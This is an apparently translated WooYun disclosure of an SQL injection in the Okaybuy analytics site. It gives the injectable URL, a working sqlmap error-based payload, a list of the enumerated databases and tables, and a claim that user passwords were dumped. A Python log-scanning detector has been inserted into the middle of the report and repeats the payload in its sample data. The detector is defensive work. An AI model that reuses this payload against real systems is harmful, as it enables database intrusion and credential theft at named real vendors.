Vulnerability summary

Defect ID: wooyun-2014-066036

Title: 好乐买 (Okaybuy) platform SQL injection + weak password (affects the main site and the back end)

Vendor: 好乐买 (Okaybuy)

Author: 路人甲

Submitted: 2014-06-24 13:42

Fix time: 2014-08-08 13:44

Published: 2014-08-08 13:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-06-24: Vendor contacted, awaiting vendor acknowledgement; details not disclosed publicly
2014-08-08: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Let's see whether your site belongs to a big vendor or a small one.

Details:

0x01. Injection: http://traffic.okaybuy.com.cn/ip_dst.php?site=1%27

[screenshot: 222.png]


sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: site
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: site=1' AND (SELECT 2989 FROM(SELECT COUNT(*),CONCAT(0x7162687771,(SELECT (CASE WHEN (2989=2989) THEN 1 ELSE 0 END)),0x7162677371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pwoh'='pwoh
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] OkayBuyCount
[*] test


Database: OkayBuyCount
[483 tables]
+---------------------------+
| Admin |
| Config |
| HisData |
| IPData |
| IPHis |
| IPPV |
| MediaPic |
| Shop |
| Shop_utf8 |
| Traffic |
| Traffic_20130926_20131210 |
| day_postion_order |
| day_postion_tj |
| shop_close |
| tb_cliporder |
| tb_daystat |
| tb_mideaexp |
| temptable_nuomicount |
+---------------------------+
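A detection check for the probe shown above, added here as an example and not part of the original report: it parses Apache combined-format access logs (constructed sample lines, including the report's own sqlmap payload URL-encoded as a client would send it) and flags query parameters carrying the MySQL duplicate-key error-based pattern. The log format, the signature names and the sample client address are my assumptions.

```python
"""Flag MySQL error-based (duplicate-key) SQL injection probes, such as the sqlmap
payload in this report, in Apache combined-format access logs."""
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures applied to the URL-decoded, lower-cased value of each query parameter.
SIGNATURES = {
    "dup_key_trick": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    "group_by_alias": re.compile(r"group\s+by\s+\w+\s*\)"),
    "schema_probe": re.compile(r"information_schema\.\w+"),
    "hex_marker": re.compile(r"concat\s*\(\s*0x[0-9a-f]+"),
    "closing_tautology": re.compile(r"\band\s+'(\w+)'\s*=\s*'\1$"),
}

# Apache combined log: ip identd user [timestamp] "METHOD path PROTO" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+')

def suspicious_params(path: str) -> dict:
    """Return {param: [matched signature names]} for a request path with query string.
    parse_qsl URL-decodes once (%27 -> '), so payloads are matched in clear text.
    A lone quote such as site=1%27 matches nothing: by itself it is too noisy to alert on."""
    hits = {}
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value.lower())]
        if matched:
            hits[name] = matched
    return hits

def scan_log(lines) -> list:
    """Return (client_ip, path, {param: signatures}) for each request that matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := suspicious_params(m.group("path"))):
            findings.append((m.group("ip"), m.group("path"), hits))
    return findings

# Constructed sample log: a normal request, the quote probe from the report, and the
# sqlmap error-based payload from the report, URL-encoded as a client would send it.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Jun/2014:13:40:01 +0800] "GET /ip_dst.php?site=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [24/Jun/2014:13:40:02 +0800] "GET /ip_dst.php?site=1%27 HTTP/1.1" 500 230',
    '203.0.113.5 - - [24/Jun/2014:13:40:03 +0800] "GET /ip_dst.php?site=1%27%20AND%20%28SELECT%202989'
    '%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162687771%2C%28SELECT%20%28CASE%20WHEN%20%282989'
    '%3D2989%29%20THEN%201%20ELSE%200%20END%29%29%2C0x7162677371%2CFLOOR%28RAND%280%29%2A2%29%29x'
    '%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27pwoh%27%3D%27pwoh'
    ' HTTP/1.1" 500 1024',
]
```

Only the third sample line is reported, with all five signatures on the `site` parameter; a 500 response on a probe like the second line is the server-side symptom worth correlating with these hits.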


Proof of vulnerability:

[screenshot: asd.png]


# I only dumped the user passwords of this analytics platform.

Fix recommendation:

Your database has quite a personality.

Copyright notice: when reposting, credit the source 路人甲@乌云


Vendor response

Vendor response:

Vendor could not be contacted, or vendor actively refused


Vulnerability rating:

Comments

  1. 2014-08-08 16:31 | 暗影侠客 ( Passer-by | Rank:4 Vulns:5 | xss,inject,ctrf)

    Why does it say this affects the main site and the back end? This is their user tracking system!